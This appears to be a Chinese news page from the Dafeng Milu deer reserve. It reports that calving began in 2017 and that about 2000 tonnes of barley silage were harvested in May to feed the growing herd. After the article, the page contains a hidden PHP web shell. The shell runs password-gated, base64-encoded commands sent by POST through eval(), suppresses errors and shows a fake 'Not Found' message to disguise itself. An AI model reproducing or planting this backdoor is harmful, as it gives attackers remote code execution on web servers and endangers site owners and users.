最新要闻

首页 > 最新要闻 >

    麋鹿保护区圆满完成春季大麦青贮收贮任务

           2017年3月大丰麋鹿保护区的第一头小麋鹿出生了,这标志着麋鹿的产子期开始了,然而目前麋鹿的产仔期还未结束,小鹿数量仍在不断增长,麋鹿种群数量会被再次刷新。 随着麋鹿种群日益壮大,在有限的生存空间实现对大群麋鹿的饲养管理,原本只有冬春季节麋鹿缺少食物,现在夏秋季节也面临食源紧张的情况,保护区面临着严峻的考验。

     
           为满足麋鹿食物需要,保护区采取春季大麦青贮饲料进行投喂。保护区技术人员考察周边的大麦田亩情况,选择了面积大、长势好、无农药、无毒物残留的大麦,并且要求在大麦乳熟后期收割,确保营养丰富,收割时基部不得带土,无霉变、无杂草、现收现送,确保新鲜。      
     
           从5月6日开始进行收贮,在全体收贮人员共同努力之下,以及周边社区公众热心支持,收贮历时仅5天,于5月11日完成了近2000多吨的青贮任务。收贮期间出现阴雨天气,保护区工作人员仍然坚持工作,圆满完成了既定的收贮工作,使麋鹿饲养管理有序进行,确保夏秋季节麋鹿日粮有效供给。
     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>